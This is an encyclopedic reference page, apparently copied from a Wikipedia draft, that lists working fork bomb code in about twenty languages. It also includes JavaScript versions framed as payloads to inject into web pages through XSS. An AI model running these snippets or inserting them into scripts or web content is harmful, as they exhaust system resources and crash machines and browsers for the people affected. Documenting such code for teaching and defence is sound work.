Examples of fork bombs
This page lists some examples of fork bombs in different programming languages.
Examples[edit]
Bash[edit]
:(){ :|:& };:
The trick here is that : is a function name — otherwise it is identical to bomb() { bomb | bomb & }; bomb.
Same as above, but encoded into a standalone shell script as opposed to a shell function:
#!/bin/bash
./$0|./$0&
Windows batch[edit]
:s
start "" %0
goto s
The same as above, but shorter:
%0|%0
Combining the two:
:s
start "" %0
%0|%0
goto s
The same as above, but done in command line using ^ to escape specials:
echo %0^|%0 > forkbomb.bat
forkbomb.bat
Perl[edit]
An inline shell example using the Perl interpreter:
perl -e "fork while fork" &
PHP[edit]
<?php
while(true) {
pcntl_fork();
}
?>
Python[edit]
import os
while 1:
os.fork()
Java[edit]
public class ForkBomb {
public static void main(String[] args) {
while(true) {
Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
}
}
}
Ruby[edit]
loop {
fork {
load(__FILE__)
}
}
Haskell[edit]
import Control.Monad (forever)
import System.Posix.Process (forkProcess)
forkBomb = forever $ forkProcess forkBomb
main = forkBomb
Common Lisp (Clozure CL)[edit]
(loop (#_fork))
C[edit]
#include <unistd.h>
int main(void) {
while(1) {
fork(); /* malloc can be used in order to increase the data usage */
}
}
C++[edit]
#include <unistd.h>
int main(void) {
while(1)
fork();
return 0;
}
C# (.NET)[edit]
static void Main() {
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}
Visual Basic .NET[edit]
Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True
Assembly (Netwide Assembler code for Linux running on a IA-32 CPU)[edit]
section .text
global _start
_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start
PowerShell[edit]
while($true) {
Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}
JavaScript[edit]
JavaScript code can be injected into a web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:
<a href="#" onload="function() {while (true) {var w = window.open(); w.document.write(document.documentElement.outerHTML || document.documentElement.innerHTML);}}">XSS fork bomb</a>Or, a more aggressive version:
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
Node.js, using JavaScript[edit]
(function f() {require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']);}());
This can also be run using shell, similar to approach it uses in inside:
node -e "(function f() {require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']);}());"
See also[edit]
External links[edit]
This article "Examples of fork bombs" is from Wikipedia. The list of its authors can be seen in its historical. Articles copied from Draft Namespace on Wikipedia could be seen on the Draft Namespace of Wikipedia and not main one.
